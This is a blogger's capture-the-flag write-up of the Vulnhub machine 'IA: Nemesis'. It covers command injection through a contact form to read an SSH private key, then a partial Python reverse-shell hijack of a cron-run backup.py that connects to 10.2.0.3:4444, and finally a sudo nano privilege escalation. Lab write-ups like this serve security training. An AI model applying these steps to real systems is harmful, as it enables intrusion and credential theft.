IA: Nemesis Vulnhub Writeup
Nice some ports re opens, and ssh is on port: 52846 , let’s browse
But nothing interesting here, we noticee that port 52845 is http, let’s browse
Now let’s enumerate the browser and we can found something interesting.
Let’s move on “Contact us” , we can write so, we can do a command injection?
Nice and we have username!
thanos and carlos are the users, so we can try to find RSA key in the follow directory /home/thanos/.ssh/id_rsa and and try to enter in ssh!!
And we have the KEY!!!!!! Save it in file id_rsa and give the permission: chmod 600 id_rsa and let’s login in ssh!!
GOT FIRST FLAG!! Now let’s enumerate!
We find the file “backup.py” at this moment i stuck! but thank you google! i found how to bypass this step!
lhost = “10.2.0.3”
lport = 4444
ZIP_DEFLATED = 0
def __init__(self, *args):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
After creating our script, give execute permission chmod +x zipfile.py and listen on the netcat!
We notice that file “backup.py” execute always every one minutes! So just listen on the port!
Nice we take the second flag!!!! Now let’s go to root this box!
We have an hint in the file root.txt! So let’s see this file!
As we can see , this hash encrypted is encrypted with affine encryption!!! So we need to fine on google “affine chiper decrypt”!
And we finally found the password! But didn’t work for root, so we can use that for carlos, for finding sudo vulnerabilities!
Vertical Privilege Escalation:
Go on GTFO bins and find “nano”
Command: sudo /bin/nano /opt/priv
BUT! For doing this just become on the shell of thanos and press su carlos and insert password
I Hope this is usefull! Follow me on Twitter too @ 0xJin